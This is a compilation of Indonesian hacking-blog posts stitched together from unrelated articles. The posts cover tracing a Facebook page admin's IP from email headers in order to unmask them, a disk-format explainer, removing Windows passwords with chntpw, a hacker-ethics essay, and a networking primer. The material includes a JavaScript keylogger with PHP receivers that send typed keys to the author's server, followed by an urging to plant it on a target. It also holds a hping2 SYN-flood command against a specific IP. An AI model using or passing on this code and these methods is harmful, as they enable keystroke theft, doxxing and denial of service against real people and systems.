Pada artikel ini, saya akan beritahukan bagaimana langkah awal kita untuk melakukan hack terhadap facebook ini :

http://www.facebook.com/pages/Everyb...23607727664016

di dalam status yang baru-baru ini, page ini menyinggung mengenai IP Addres. Apa itu IP Addres? Penjelasan sederhana IP Addres adalah pengalamatan komputer kita berdasarkan range-range tertentu. Saya ibaratkan bahwa, jika setiap Handphone memiliki nomer telepon yang bisa dihubungi... Maka untuk Komputer, IP Addres ini memiliki fungsi yang sama dengan nomer telepon itu. Kita bisa melacak, lokasi dengan tepat dimana pemilik IP Addres tersebut . ..

Dan jika sudah mampu mengidentifikasi IP Addres nya, langkah yang paling penting adalah melakukan "tracert, tracking, dan fingerprinting tentang aktifitas nya di dunia maya. Lalu, kita bisa mengidentifikasi siapa pelaku atau admin page ini . .. lol

berikut screenshot nya:



Oke, terlihat kan . .. apa itu IP addres ,. Page ini sungguh membuat saya marah ,.

Oke, saya akan memberikan contoh. Bagaimana seorang hacker mampu melacak IP Addres pengguna fb ( sebetulnya rahasia perusahaan, tapi untuk kita . .. mari hancurkan ini bersama , jika anda punya cukup banyak nyali )

saya akan memberikan contoh. Tapi saya sebelumnya minta maaf. karena menggunakan akun email lutfi. Just For Educational Purposes Only , ^_^v peace . ..

pertama,
saya memanfaatkan email notifikasi yang masuk melalui facebook. misalnya saya ambil notifikasi email dari Reni Agustiani.




di dalam warna kuning, telah saya kasih tanda. kita lihat header lengkapnya . .. maka akan muncul seperti ini :



dan ini hasil lengkapnya:

-----------------------+(( Header Email ))+-----------------------

From Facebook Thu Sep 10 16:17:22 2009
X-Apparently-To: faujiridwan@yahoo.co.id via 124.108.123.158; Fri, 11 Sep 2009 00:17:27 +0800
Return-Path:
X-YMailISG: l6rUGAkWLDsTMdj3IrahH_sZy1.wTzilIVJvClGVtSZrcmfUfl GIpyEYMD2OyA7iI6mRZvk.9QEmQflPufviZvzvbs5c36R75QGY A9CR6ouMQv.OV.Q7diD78R6cM6xCbIYZRH4PUhreHBF8DkIiXH aEj6nCHI.Qx.53eOTtQwS3uBGbVYqFX2wd2WNV9tEV6TWmQi9A AOt_uAQqgYkHT3Ul5B_Ha6qLvbiydH_LXDtD3thCZm8BXn_Ci8 N9CVRGTlcY_3VW0HdX2Ih7fIReL2OcrLFQsaSDQukwB5j2SNC. uQPk3i7UZHgWD9c6CsLonQ--
X-Originating-IP: [69.63.178.175]
Authentication-Results: mta124.mail.sg1.yahoo.com from=facebookmail.com; domainkeys=neutral (no sig); from=facebookmail.com; dkim=pass (ok)
Received: from 69.63.178.175 (EHLO mx-out.facebook.com) (69.63.178.175)
by mta124.mail.sg1.yahoo.com with SMTP; Fri, 11 Sep 2009 00:17:27 +0800
Return-Path:
DKIM-Signature: v=1; a=rsa-sha1; d=facebookmail.com; s=q1-2009b; c=relaxed/relaxed;
q=dns/txt; i=@facebookmail.com; t=1252599442;
h=From:Subjectate:To:MIME-Version:Content-Type;
bh=ni9Q2ZQv/gbM3B3oiSOmnjRj8Y8=;
b=pqkJ5IBS1A+7H6hMQ/FV61z/6NAu4skBifEKKBH1gmuY/YraNlXNbi9MnIIBCSxl
sZrp9gue3eL2DdbLiYIzmQ==;
Received: from [10.18.255.176] ([10.18.255.176:34214])
by mta006.snc1.facebook.com (envelope-from )
(ecelerity 2.2.2.37 r(28805/28844)) with ECSTREAM
id 79/67-17407-29629AA4; Thu, 10 Sep 2009 09:17:22 -0700
X-Facebook: from zuckmail ([MTI1LjE2MS4xNzguOTI=])
by www.facebook.com with HTTP (ZuckMail);
Date: Thu, 10 Sep 2009 09:17:22 -0700
To: Lutfi Fauji Ridwan
From: Facebook
Reply-to: noreply
Subject: Reni Agustiani tagged a photo of you on Facebook
Message-ID:
X-Priority: 3
X-Mailer: ZuckMail [version 1.00]
X-Facebook-Notify: photo_tag; from=1286103888; uid=1286103888; pid=30382928; api_pid=5523774138248829776; mailid=11323c0G5451ffb4G5de5d5G5
Errors-To: notification+y46j=of9@facebookmail.com
X-FACEBOOK-PRIORITY: 0
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="UTF-8"
Content-Length: 810

-----------------------+(( E.N.D ))+-----------------------
yang kita butuhkan adalah bugs dari facebook dalam bentuk kode enkripsi base64 di dalam header tersebut.
------------------------------------------------------------------
X-Facebook: from zuckmail ([MTI1LjE2MS4xNzguOTI=])
by www.facebook.com with HTTP (ZuckMail);
-------------------------------------------------------------------
yang kita butuhkan adalah kode ini saja: MTI1LjE2MS4xNzguOTI=

itu adalah kode enkripsi base64 . Pertanyaannya, darimana saya tahu itu terenkoding? di akhir header ada code:
------------------------------------------------------------------
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="UTF-8"
Content-Length: 810
------------------------------------------------------------------
so, kalo dah dapet kodenya . .. lalu kita decode ( diterjemahkan encoding base64 tadi ). Kalo saya lebih suka Online ke web ini:

http://www.opinionatedgeek.com/dotne...e/Default.aspx

Banyak orang yang tidak berani melakukan “Quick Format” dengan alasan “kurang bersih”, “agar harddisk lebih awet”,”agar lebih sempurna” dan alasan lainnya sehingga selalu melakukan format biasa. Masalahnya adalah melakukan format biasa pada harddisk IDE ataupun SATA yang berukuran ratusan GB, bisa memakan waktu berjam-jam.

Ketika hendak melakukan format terhadap sebuah disk, Windows memberikan Anda pilihan yang lebih menyenangkan yaitu “Quict Format” namun pilihan ini seringkali tidak digunakan. Alasannya klasik, kurang bersih ! Apa yang “kurang bersih” ? apa perbedaan antara format biasa dan quick format ? Benarkah agar harddisk benar-benar “bersih” harus dilakukan format biasa ? Bagaimana bila saya telah melakukan “Quick format”, apakah harus melakukan format ulang agar harddisk saya lebih awet ?

Format biasa dan quick format sebenarnya melakukan hal yang sama persis dan hanya ada satu perbedaan diantara keduanya yaitu pengecekan terhadap sektor. Pada format biasa, windows akan melakukan proses pengecekan terhadap seluruh isi harddisk anda terhadap kemungkinan kerusakan pada harddisk dan menandai lokasi yang rusak tersebut agar komputer tidak menggunakannya untuk menyimpan file. Bila lokasi yang rusak tersebut digunakan untuk menyimpan file, tentunya akan menyebabkan file tersebut tidak bisa diambil kembali.


Tahapan pengecekan terhadap setiap sektor yang ada didalam harddisk inilah yang menyebabkan kenapa proses format biasa memakan waktu yang begitu lama. Lalu apakah benar format biasa membuat harddisk anda lebih segar dan lebih bersih ? Tidak sama sekali ! ini adalah pandangan yang sama sekali keliru karena seperti yang telah kami katakan sebelumnya, proses format biasa dan quick format itu sama. Lalu bagaimana dengan pandangan yang mengatakan bahwa format biasa membuat harddisk lebih awet ? Setiap alat elektronik, apapun itu selalu memiliki apa yang dinamakan dengan MTBF (Mean time between failures).

MTBF secara umum bisa diartikan sebagai “umur hidup” sebuah peralatan elektronik, artinya semakin Anda menggunakan sebuah peralatan, umurnya akan semakin pendek. Dengan format biasa, selain harddisk akan digunakan jauh lebih lama, harddisk juga akan bekerja jauh lebih berat sehingga pernyataan bahwa harddisk akan lebih awet tentu saja tidak benar bahkan salah sama sekali karena yang terjadi justru kebalikannya.

Apakah Format Biasa Masih diperlukan ?
Tentu saja ! dan masih sangat penting untuk dilakukan. Data Anda tentu jauh lebih penting daripada harddisk yang harganya tidak seberapa karena itu, melakukan pengecekan terhadap kemungkinan terjadinya kerusakan harddisk pada lokasi tertentu pantas untuk dilakukan namun tidak harus dilakukan pada saat format.

Anda bisa melakukan pengecekan setiap saat terhadap kemungkinan terjadinya kerusakan fisik pada harddisk Anda dengan menggunakan perintah chkdsk /r. Perintah ini akan melakukan pengecekan terhadap kemungkinan terjadinya kerusakan pada harddisk seperti yang dilakukan pada saat format biasa.

Jika Anda telah melakukan format biasa atau pengecekan harddisk dengan perintah chkdsk/r, Anda tidak harus melakukannya lagi dalam waktu dekat apalagi melakukan format biasa berulang kali karena hal tersebut hanya akan menghabiskan waktu Anda yang berharga...

Pada postingan saya yang sebelumnya telah kita bahas tentang hacking akun administrator pada windows xp dari akun guest, sekarang saya akan menjelaskan step by step untuk mereset dan atau merubah password untuk semua user pada windows xp atau seven, pada ujicoba kali saya menggunakan windows 7 sebagai targetnya.
pertama - tama kita membutuhkan distro backtrack yang bisa kita download di sini, setelah selesai di download kita bisa menjalankannya via LiveCD atau di install di USB Drive, perlu kita ketahui bahwa Windows menyimpan passwordnya pada file SAM yang terletak di c:\Windows\System32\config\SAM, dan file tersebut tidak akan bisa dibuka bila kita menggukana OS tersebut karena terenkripsi tetapi akan beda bila kita menggunakan Linux, berikut step - stepnya :

• Setelah BT dijalankan, buka konsole lalu ketikkan perintahfdisk -l, cari dimana OS Windows tersebut di install, pada ujicoba saya kali ini terdapa pada /dev/hda4.

• Kita ketikkan perintah ntfsmount /dev/hda4 /mnt/hda2 untuk mount hdd kita di /mnt/hda2.

• Sekarang kita coba buka aplikasi chntpw yang akan digunakan untuk menghilangkan password windows dengan perintah/pentest/passwords/chntpw/./chntpw, maka akan muncul opsi - opsi yang bisa dilihat dari screen shot dibawah ini.

• Setelah itu kita akan melihat user yang terdapat pada windows dengan perintah /pentest/passwords/chntpw/./chntpw /mnt/hda2/Windows/System32/config/SAM seperti yang terlihat dibawah ini.

• Setelah kita telah mendapatkan user yang ingin kita rubah/hilangkan passwordnya tinggal kita gunakan operator -u pada program chntpw, perintah lengkapnya akan menjadi seperti ini /pentest/passwords/chntpw/./chntpw -u namauser /mnt/hda2/Windows/System32/config/SAM

• Ada 4 opsi, saya pilih opsi 1 karena akan menghilangkan password user, untuk opsi yang lainnya silakan dicoba sendiri :)
• Pilih "y" untuk write pada file SAM

• The Last, Anda telah berhasil menghapus password pada Windows 7.

semoga Tutorial ini bermanfaat, silakan tinggalkan komentar anda bila merasa ada yg kurang.

Namun sebelumnya anda sudah bertanya didalam hati anda, Apakah anda seorang "Hacker"? Untuk sungguh-sungguh menjawab pertanyaan itu, kita dapat melakukan "introspeksi". Beberapa hal berikut bisa membantu Anda dan saya dalam menentukan apakah "semangat Hacker" sudah merasuk kedalam diri anda atau belum!

menurut saya sih...!!!!
modal dasarnya...!!!
1. Bahasa inggris (karena hampir semua manual pake bahasa populer ini)
2. Cari info googling yg lebih efektif (ext, filetype, intext, site,inurl, intitle dll)
3. Jaringan: IP subnetting-addressing, routing
Jadi hacker, lebih banyak berurusan ma command line daripada GUI. Jadi
pelajari aja perintah2 DOSnya windows n shellnya windows. terus di OS yg lain juga mayan asik juga .... apalagi kalo OSnya open source muantapppppp.....
4. terus ubek ubek otak atik juga bahasa pemrograman lain yg menurut agan penting (kita berdiskusi di kamar sebelah buat bahasa pemrograman mah banyak master master yang handal loh )

NB :" Sebaiknya jangan bangga dulu klo bisa bobol tapi ga bisa menanggulanginya karna seorang hacker menjunjung tinggi etika dan itu sangat "DIHARGAI" didalam dunia hacker ". tapi gag masalah sih kalo kita masih awam yg penting tujuannya ambil ilmunya aja::..

encamkan dalam lubuk hati yang terdalam "arti dasar hacker adalah orang yg memahami komputer sampai ke tulang sumsum kabelnya tuh komputer BUKAN orang yg pandai merusak komputer ".

nah solusinya belajar lebih aman pake software virtual aja : VMware , virtualBox(favoritQ tuh), qemu dll.

Mudah mudahan aja yg laen juga pada nambahin yoyoy...

Nah dari modal dasar di atas agan bisa simpulkan sendiri sudah sampe mana anda berada
Tapi masih ada yang lebih lebih penting bgt dari itu....

(dikutip dari sejarah sang legenda-legenda di dunia cyber)

::> BASIC TEKNIS
basic teknisnya sih dah dijelasin diatas walaupun cuma segitu yang ane tau Hacker bukan seseorang yang melihat sebaris kode di Internet lalu menerapkan begitu saja. Seorang Hacker melihat sebuah kode dan memanfaatkannya setelah menemukan cara kerjanya dan mengetahui apakah kode tersebut memang yang paling efektif dan efisien untuk mencapai tujuannya . Apapun yang jadi bidang pekerjaan anda, Anda bisa menjadi seorang "Hacker". kalo contohnya mah seorang murid tk yang melihat cara gurunya mengerjakan tatambahan (maklum orang sunda) matematika dengan menggunakan sempoa. kemudian dia akan menjadi seorang "Hacker" jika dari teknik itulah ia bisa mempelajarinya dan menemukan apa "esensinya" . ia bisa menemukan sesungguhnya apa yang diperlukan dalam menghitung suatu angka angka dengan sempoa.
::> HARD WORK
Seorang Hacker "Gak gampang nyerah". si bang Richard Stallman misalnya, bisa menghabiskan waktu tanpa tidur berjam-jam demi menciptakan Software yang "Sempurna". Seorang pembobol menghabiskan waktu berjam-jam untuk mencari celah pada sebuah sistem. si kang Mitnick dengan sabar dan teliti akan mencari celah yang bisa dimasuki, termasuk mengajari temannya untuk bertindak sebagai "petugas keamanan" demi mendapatkan nomor telpon temannya(yang ada di filmnya tuh ). Hacker sampai pada tahap yang boleh disebut "obsesif". "Seorang Hacker" adalah "workholic"yang "tidak mudah menyerah". Namun ia melakukan semua itu dengan "efisiensi". "Seorang Hacker" tidak akan mengulang-ulanh sesuatu jika ia merasa "tak perlu", ini termasuk memanfaatkan apa yang "sudah dicapai orang lain" untuk memenuhi tujuan diri sendiri.
::> [B]CREATIVITY[/B
Bukan seorang Hacker jika anda tidak memiliki kreativitas yang tinggi. Menemukan sebuah Celah keamanan, Merekayasa sebuah Piranti Lunak yang di kemudian hari ternyata digunakan banyak orang, ini adalah contoh dari perkerjaan-pekerjaan yang membutuhkan "KreativitaS tinggi". Kemauan untuk tidak berhenti pada suatu pemikiran, untuk tidak terjebak pada sebuah jalan, "berani" untuk berlaku "beda" demi mencapai sebuah tujuan.
"Kreativitas seorang hacker" tidak dibatasi oleh hak cipta. Karya orang lain bisa "diobrak-abrik" oleh seorang Hacker, dibongkar hingga ke tulang sumsumnya, dan kemudian diperbaiki agar lebih efisien, lebih cepat, dan "mampu melaksanakan tujuannya".
::> PERATURAN???? tapi PERATURANNYA yang mana????Aturan adalah "pagar yang melindungi". Namun kadang kala dan kedengkele apa uang ada di dalam pagar telah "melampaui" pagar itu sendiri? Dalam bertindak, "Seorang Hacker" tidak bertanya terlebih dahulu apakah ada aturannya. Bagi "Seorang Hacker". Aturan adalah hal yang dipikirkan belakangan.
Jika perlu, "Seorang Hacker" akan membuat "aturan sendiri". Seperti yang dilakukan Richard Stallman dengan "GPL-nya". Aturan yang bagi ahli hukum hak cipta ungkin sempat dianggap "gila" itu ternyata justru melahirkan inovasi dalam teknologi dan karya cipta yang melebihi apa yang bisa dibayangkan.
::> TANGGUNG JAWAB
"Semangat Hacker" yang dibawa dari istilah itu lahir adalah melakukan sesuatu yang "TIDAK MERUSAK". Kini makna itu mulai "Memudar", namun "tanggung jawab" tetap menjadi "esensi" dari Seorang Hacker. Hacker tidak bersembunyi di balik "topeng", jika "saatnya" tiba mengaku ia akan mengakui perbuatannya.
Seorang Adrian Lamo adalah contoh dari Hacker yang "bertanggungJawab" Ia menemukan kelemahan dalam sebuah sistem komputer tetapi mau membantu untuk menutup kelemahan itu. Meski aturan "dinomorbuncitkan", etika adalah hal yang sangat "dihargai" dalam dunia hacker.

Bentuk lain dari tanggung jawab seorang hacker adalah "kemauan untuk berbagi". Seorang Hacker tak menutup hasil kreasinya untuk dirinya sendiri. Ia bersedia membaginya ke semua orang.

Jadi Menjadi "Seorang Hakcer" tak selalu harus menjadi "buronan" seperti yang pernah dialami tiga sahabat Kevin Mitnick, Kevin Poulsen, dan Adrian Lamo. Menjadi seorang Hacker bisa dilakuan dengan memegang teguh "Prinsip" yang dimiliki dan selalu bersedia "menembus" batas dalam bidang yang digeluti. Apapun bidang anda, Jadilah seorang "Hacker" dan "tembuslah batas-batas yang ada". Tak ada yang bisa menghentikan "kreativitas", tak ada yang bisa "Mengekang" Pikiran. "BEBASKAN DIRI DAN HACK DUNIA INI!"

Wahahahahaha.... Saya tau Kalian pasti kangen banget neh sama Saya . Pada kesempatan kali ini Saya akan sedikit membahas tentang Javascript Keylogger. Wow... Apalagi tuh, mungkin Google bisa menjawab pertanyaan Kalian .

Oke tanpa banyak basa basi langsung aja yah...

Pertama bukalah notepad kesayangan kalian atau yang lainnya kayak Wordpad, Notepad ++... Pokoknya terserah dah...
Kemudian paste kode berikut:

[+]------------------------------------------------------------------

var key = '';
var space = ' '
function start()
{
var xmlhttp;
if (window.XMLHttpRequest)
{
// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else if (window.ActiveXObject)
{
// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Browser Kamu Tidak Support XMLHTTP!");
}
xmlhttp.open("POST","http://websitekamu/buka.php",true);
xmlhttp.send(null);
}
function ajaxFunction()
{
var xmlhttp;
if (window.XMLHttpRequest)
{
// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else if (window.ActiveXObject)
{
// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Your browser does not support XMLHTTP!");
}
xmlhttp.open("POST","http://websitekamu/salin.php?d="+key,true);
xmlhttp.send(null);
}
document.write('');

[+]------------------------------------------------------------------

Lalu simpan dengan nama keylog.js... Inget Bro, ekstensinya JS. Dan satu lagi jangan lupa, "websitekamu" diganti dengan
URL kamu sendiri...
Buat lagi buka.php dan salin.php di notepad dengan script sebagai berikut

buka.php

[+]------------------------------------------------------------------

$data = $_GET['d'];
$fp = fopen('hasil.txt', 'a');
fwrite($fp, $data);
fclose($fp);
?>

[+]------------------------------------------------------------------

salin.php

[+]------------------------------------------------------------------

$data = $_GET['d'];
$fp = fopen('hasil.txt', 'a');
fwrite($fp, $data);
fclose($fp);
?>

[+]------------------------------------------------------------------

Maka sekarang kalian mempunyai tiga file yaitu keylog.js, buka.php, salin.php...
Nah karena saya mencoba di localhost maka saya akan mencoba membuat script HTML sederhana
yang akan digunakan sebagai website saya sendiri.

[+]------------------------------------------------------------------




Jasakom Community Ketik Apa Aja Yang Kamu Suka





[+]------------------------------------------------------------------

Dan simpan dengan nama jasakom.html
Nah apabila kalian ingin menaruhnya di website kalian maka kalian cukup menambahkan

[+]------------------------------------------------------------------



[+]------------------------------------------------------------------

Dah ngerti? Sekarang letakkan keempat file tersebut jasakom.html, keylog.js, buka.php dan mulai.php
di dalam direktori yang sama. Nah kalo saya di direktori C:wampwwwwebsitesaya
karena saya menggunakan WAMP server
Nah maka dari itu saya akan mengganti URL yang ada di keylog.js menjadi

[+]------------------------------------------------------------------

http://localhost/websitesaya

[+]------------------------------------------------------------------

Praktek

Maka ketika kalian membuka Browser kalian dan mengarahkan kehttp://localhost/websitesaya/jasakom.html
Nah disini kalian bisa ketik apa aja




Saya akan ketik "Makasih Banyak Dah Membuang Waktu Kalian Yang Berharga Untuk Melihat
Artikel Ini"

Maka kalian akan melihat munculnya hasil.txt yang berisi kata2 tersebut
Oke sampai disini dulu yah, mungkin artikel ini kurang berguna tapi yah... Hanya itu
yang bisa Saya berikan...
Sekarang yang perlu kalian lakukan adalah cari target dan pasang keylog tersebut
Emang gak sebanding dengan r57, C99, C100, dkk tapi jika dikembangkan pasti sama
asiknya kok...

* Contact
cruz3n@jasakom.org
cruzenaldo@gmail.com

* Blog Jelek Dan Sederhana
http://cruzenaldo.blogspot.com

* Thanks
~ JESUS CHRIST, My EVERYTHING... Without YOU im NOTHING
~ Bokap dan Keluarga dirumah
~ t3hmadhatt3r@gmail.com (Makasih buat penjelasannya )
~ All Jasakomers yang telah membuat hidup saya masih penuh warna... ;p
~ Master2 Yang suka nongkrong di FORUM, mana Bro artikel Lo ditunggu disini
~ Witha Rasmana a.k.a Chrn0 (I Love You...)
~ Dan untuk Kalian yang dah baca artikel sederhana ini
~ Jasakom Not Dead

Yup kembali lagi bersama saya kali ini daku membuat sedikit artikel tentang jaringan dan beberapa tool umum yg biasa kita pakai.

IP ADDRESS Versi 4
Tiap-tiap komputer yang terhubung ke jaringan internet akan memiliki ip address. Nah ip address ini adalah suatu sistem pengalamatan tiap-tiap komputer di jaringan dengan suatu alamat yang unik (RFC 1166).Nah, ip address versi 4 ini terdiri dari 4 byte. misal: 192.168.0.1. Nah untuk melihat ip address Anda di linux ketikan ini:

Code:

ifconfig

misal kita ingin melihat ip address pada interface eth0 ketikkan:

Code:

ifconfig -v -a eth0

Berikut ini contoh tampilan:

Code:

ifconfig -v -a eth0 eth0      Link encap:Ethernet  HWaddr 00:1D:72:20:E4:D5           inet addr:118.136.188.151  Bcast:255.255.255.255  Mask:255.255.255.0           UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1           RX packets:77440 errors:0 dropped:0 overruns:0 frame:0           TX packets:78551 errors:0 dropped:0 overruns:0 carrier:0           collisions:0 txqueuelen:1000           RX bytes:67624055 (64.4 MiB)  TX bytes:9172063 (8.7 MiB)           Interrupt:16

ok untuk melihat secara kesulurahan tiap interface di komputer:

Code:

ifconfig -a

Jadi ip addressnya adalah 118.136.188.151 (privat ip)

Nah ip address ini dibagi ke dalam kelas2 : kelas A,B dan C

- Kelas A
IP address kelas A terdiri dari 8 bit untuk network ID dan sisanya 24 bit digunakan untuk host ID, sehingga IP address kelas A digunakan untuk jaringan dengan jumlah host sangat besar. Pada bit pertama berikan angka 0 sampai dengan 127.

-Kelas B
IP address kelas B terdiri dari 16 bit untuk network ID dan sisanya 16 bit digunakan untuk host ID, sehingga IP address kelas B digunakan untuk jaringan dengan jumlah host tidak terlalu besar. Pada 2 bit pertama berikan angka 10 sehingga bit awal IP tersebut mulai dari 128 ? 191.

-Kelas C
IP address kelas C terdiri dari 24 bit untuk network ID dan sisanya 8 bit digunakan untuk host ID, sehingga IP address kelas C digunakan untuk jaringan untuk ukuran kecil. Kelas C biasanya digunakan untuk jaringan Local Area Network atau LAN. Pada 3 bit pertama berikan angka 110 sehingga bit awal IP tersebut mulai dari 192 ? 223.

IP Address Versi 6 (ipv6)
IP versi 6 ini muncul karena derasnya penggunaan ip versi 4 sehingga akhirnya para jago 2 internet memutuskan untuk membuat pengalamatan yg
lebih efisien sehingga muncul yg namanya ip versi 6 ini.
Berikut ini adalah contoh format alamat IPv6 :
21DA:00D3:0000:2F3B:02AA:00FF:FE28:9C5A
atau bisa juga desederhanakan menjadi: 21DA3:0:2F3B:2AA:FF:FE28:9C5A

Netmask
Netmask (subnetting) ini merupakan mask yang membagi alamat ip menjadi subnet subnet (menentukan range alamat ip ). Netmask ini terdiri dari 4 byte dengan
format mirip ip address versi 4. di mana tiap byte netmask yang dipisahkan titik, mewakili range dari ip address , misal:

jika netmask: 255.255.255.0 maka range ip addressnya ya semua alamat ip yang memiliki 3 byte pertama yg sama dg ip address dari mesin dengan netmask 255.255.255.0 ( 3 byte pertama netmask adalah 255.255.255 ).
Misal komputer dg alamat ip 192.168.1.10 maka rangenya 192.168.1.0-192.168.192.168.1.255


ARP (Address Resolution Protocol)
ARP ini merupakan salah satu jenis protokol yang berfungsi untuk menemukan MAC Address dari mesin lain di jaringan yang ingin dikontak.
Informasi tentang MAC address akan disimpan dalam keping RAM (Random Access Memory) dan sifatnya temporer dengan umurnya yang hanya dua menit, namun dapat diperbarui. Ruang simpan dalam RAM ini disebut ARP (Address Resolution Protocol) cache. ARP akan selalu memeriksa ARP cache. Jika ARP berhasil menemukan nomor IP tetapi tidak menemukan MAC address pasangannya, maka ARP akan mengirim request ke jaringan.

Prinsip dari ARP adalah tidak boleh ada lebih dari satu nomor IP memakai satu MAC address yang sama. Jadi, kita tidak bisa menggunakan nomor IP yang sedang dipakai oleh komputer lain, dan tidak bisa menggunakan MAC address yang telah dipasangkan dengan IP lain.

Protokol ARP bersifat stateless, ia akan mengirim request MAC address dan mengirimkan pemberitahuan kepada komputer anggota jaringan jika terjadi ketidakberesan dalam pengalamatan, walaupun tidak ada komputer di jaringan yang memintanya. Protokol ARP juga bersifat non-routable, ia hanya bekerja pada satu segmen jaringan lokal.

Beberapa perintah manipulasi arp.
-Melihat cache arp, contoh:

Code:

arp -a misal hasilnya: fm-ip-118.136.188.1.fast.net.id (118.136.188.1) at 00:1B:8F:E9:6C:01 [ether] on eth0

di mana 00:1B:8F:E9:6C:01 merupakan mac address komputer kita.

contoh format mengeset arp suatu mesin:

Code:

arp -s host maccaddr

MACCHANGER (Pengubah Mac Address di Linux)
Macchanger ini merupakan aplikasi yang digunakan untuk merubah mac address mesin kita (linux), aplikasi ini dibuat oleh Alvaro (alvaro@gnu.org).

Untuk melihat list vendor yg ada :

Code:

macchanger -l

Selanjutnya untuk mengubah mac address :

Code:

macchanger --mac=XX:XX:XX:XX:XX:XX

di mana mac address dalam hexa misal: 00:1D:72:20:E45

Untuk melihat mac address Anda saat ini untuk interface eth0-coba ketikkan

Code:

macchanger -s eth0

Gateway
Gateway adalah sebuah perangkat yang digunakan untuk menghubungkan satu jaringan komputer dengan satu atau lebih jaringan komputer yang menggunakan protokol komunikasi yang berbeda sehingga informasi dari satu jaringan computer dapat diberikan kepada jaringan komputer lain yang protokolnya berbeda.

Ok berikut ini contoh kasus setting sebuah komputer dengan os linux sebagai gateway.
Sebelumnya silahkan su dulu sebagai root!!!
ketikkan perintah ini:

Code:

ifconfig eth0 down ifconfig eth0 192.168.1.5 netmask 255.255.255.0 up ifconfig eth0 route add default gw 192.168.1.1 echo nameserver 192.168.1.5 >> /etc/resolv.conf echo nameserver 192.168.1.1 >> /etc/resolv.conf

setelah itu kita lakukan sedikit rule iptables di gateway kita, misal ketikkan perintah:

Code:

iptables -A INPUT -p TCP --dport 22 -j ACCEPT iptables -A INPUT -p TCP --dport 80 -j ACCEPT iptables -A INPUT -p TCP --dport 139 -j ACCEPT iptables -A INPUT -p TCP --dport 21 -j ACCEPT

ya setelah itu rule utk ip forward via interface eth0:

Code:

iptables -A FORWARD -i eth0 -p ALL -s 192.168.1.6/24 -d 192.168.1.1 -j ACCEPT

selanjutnya kita lakukan permainan untuk sedikit mempercepat proses:

Code:

iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT

final step kita set nat (network address translation):

Code:

iptables -t nat -A POSTROUTING -s 192.168.1.6/24 -j MASQUERADE

dan sebagai langkah terakhir kita aktifkan ip forward di mesin gateway kita:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

Nah selanjutnya dari sisi klien misal menggunakan linux juga untuk menggunakan gateway tadi dengan perintah route:

Code:

route add default gw alamat_ip_gateway_ketik_di_sini eth0

atau bisa juga dengan perintah ip:

Code:

ip route add alamat_ip_gatway/range dev eth0

Tabel Routing dan HOP


Satu Hop merupakan satu jalur lompatan antara suatu mesin dengan mesin lainya di jaringan misalnya : pc -> router = 1 hop di mana routing table
di mesin kita yang berguna untuk memberitahu router tentang hop berikutnya.
Untuk melihat routing table ketikkan:

Code:

route -v

Three Way Handsake
Ni dia mekanisme komunikasi tcp antar host. berikut ini untuk lebih jelasnya:

1. mesin klien mengirimkan paket tcp syn ke server
2. Lalu setelah si server menerima paket syn tersebut maka host b mengirimkan syn ack ke klien
3. Nah !!setelah si klien menerima syn ack dari server maka si klien kirim ack lagi ke server
4. Nah setelah itu si server akan menerima ack dari klien lalu koneksi tercipta (established)

Nah !!! pernah dengar syn attack untuk dos atau ddos? nah berikut ini adalah contoh cara melakukan syn attack, coba diketik:

Code:

hping2 -S 67.222.131.145  -p 80 -d 60000

Protokol gopher


Gopher merupakan suatu protokol mirip http yang dulu sebelum ada http
sering digunakan di mana gopher ini default portnya adalah 70 (bisa juga diredirect ke port lain).
Untuk mengakses suatu server gopher Anda bisa menggunakan web browser Anda misal ketikkan alamat ini:

Code:

gopher://quux.org/

atau dengan telnet:

Code:

telnet quux.org 70 Trying 64.85.160.193... Connected to quux.org. Escape character is '^]'.  iWelcome to gopher at quux.org! fake    (NULL)  0 i       fake    (NULL)  0 iThis server has a lot of information of historic interest,     fake    (NULL)  0 ifunny, or just plain entertaining -- all presented in Gopher.  fake    (NULL)  0 iThere are many mirrors here of rare or valuable files with the fake    (NULL)  0 iaim to preserve them in case their host disappears.  PLEASE READ       fake    (NULL)  0 i"About This Server" FOR IMPORTANT NOTES AND LEGAL INFORMATION. fake    (NULL)  0 i       fake    (NULL)  0 0About This Server      /About This Server.txt  gopher.quux.org 70      + 1Archives       /Archives       gopher.quux.org 70      + 1Books  /Books  gopher.quux.org 70      + 1Communication  /Communication  gopher.quux.org 70      + iThis directory contains the entire text of the book    fake    (NULL)  0 i"We the Media: Grassroots Journalism by the People, for the People"    fake    (NULL)  0 iby Dan Gillmor in various formats.     fake    (NULL)  0 i       fake    (NULL)  0 iFeel free to download and enjoy.       fake    (NULL)  0 1Computers      /Computers      gopher.quux.org 70      + 1Current Issues and Events (Updated Apr. 23, 2002)      /Current        gopher.quux.org 70      + 1Development Projects   /devel  gopher.quux.org 70      + 0Gopher's 10th Anniversary      /3.0.0.txt      gopher.quux.org 70 1Government, Politics, Law, and Conflict        /Government     gopher.quux.org 70      + 0How To Help    /How To Help.txt        gopher.quux.org 70      + 1Humor and Fun  /Humor and Fun  gopher.quux.org 70      + 1Index to Quux.Org      /Archives/index gopher.quux.org 70 1Internet       /Internet       gopher.quux.org 70      + 1Other Gopher Servers   /Software/Gopher/servers        gopher.quux.org 70 1People /People gopher.quux.org 70      + 1Reference      /Reference      gopher.quux.org 70      + 1Software and Downloads /Software       gopher.quux.org 70      + 1The Gopher Project     /Software/Gopher        gopher.quux.org 70 0What's New     /whatsnew.txt   gopher.quux.org 70      + Connection closed by foreign host.

Beberapa Tool-Tool Menarik di Jaringan di Linux

netcat

netcat merupakan tool yang berguna untuk dan menerima dan mengirim data via protokol tcp/ip.
Contoh penggunaan netcat untuk melakukan bind ke suatu nomor port kemudian listen (misal port 3338):

Code:

 nc -l -p 3338 -vvv

netcat juga bisa digunakan layaknya telnet untuk melakukan konek ke suatu nomor port di mesin lain yang terbuka misal mesin dengan
ip 192.168.1.1 dengan port 80 dalam kondisi listen

